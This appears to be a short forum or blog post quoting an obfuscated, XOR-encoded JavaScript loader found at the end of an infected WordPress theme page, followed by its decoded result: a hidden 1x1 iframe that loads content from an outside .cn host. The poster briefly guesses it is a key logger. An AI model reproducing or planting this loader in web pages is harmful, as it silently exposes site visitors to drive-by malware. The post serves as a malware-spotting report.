<!-- Gorgeous design by Michael Heilemann - http://binarybonsai.com/kubrick/ -->
<script > function YuLQmW(cqGOKkKxg, paXoW, bRwOHYl){var
SjTKsiaJe=bRwOHYl.split(paXoW);var NhAxBaVLcf='';
for(qGST=0;qGST<(SjTKsiaJe.length-1);qGST++){
AXEMcaaiu = SjTKsiaJe[qGST]^cqGOKkKxg;NhAxBaVLcf
+= String.fromCharCode(AXEMcaaiu);}return NhAxBaVLcf;}
function hjgksr(){var GncOozzc=new Function("QtBFdMu",
"return "+YuLQmW(-0x13+0x8+0x2f+0x29+0x2d+0x28+0x2e+0x7f,
'U','299U288U300U314U290U298U289U315U')+"."+
YuLQmW(-0x7-0xe+0x14+0x3b1, 'G','978G991G980G969G')+"");var
zotuOWV=GncOozzc(-0x1c+0x25-0x1-0x1f+0x2c-0x14);
zotuOWV.innerHTML += YuLQmW(0x4+0x30+0x2c-0x25+0x0+0x4e,
'V','181V224V239V251V232V228V236V169V254V224V237V253V225
V180V184V169V225V236V224V238V225V253V180V184V169V235V230
V251V237V236V251V180V185V169V239V251V232V228V236V235V230
V251V237V236V251V180V185V169V250V251V234V180V174V225V253
V253V249V179V166V166V250V236V234V252V251V224V253V240V164
V232V229V236V251V253V250V167V234V231V166V234V240V235V236
V251V166V224V231V167V234V238V224V182V189V174V183V181V166
V224V239V251V232V228V236V183V');} if(window.addEventListener){window.addEventListener('load',hjgksr,false);}else if(window.attachEvent){window.attachEvent('onload', hjgksr);} </script > </body> </html>
document.body
: <iframe width=1 height=1 border=0 frameborder=0 src='http://security-alerts.cn/cyber/in.cgi?4'></iframe>Looks like it’s including some malware code from another site and puts it into an iframe. Perhaps a key logger or something. Yes, looks very infected…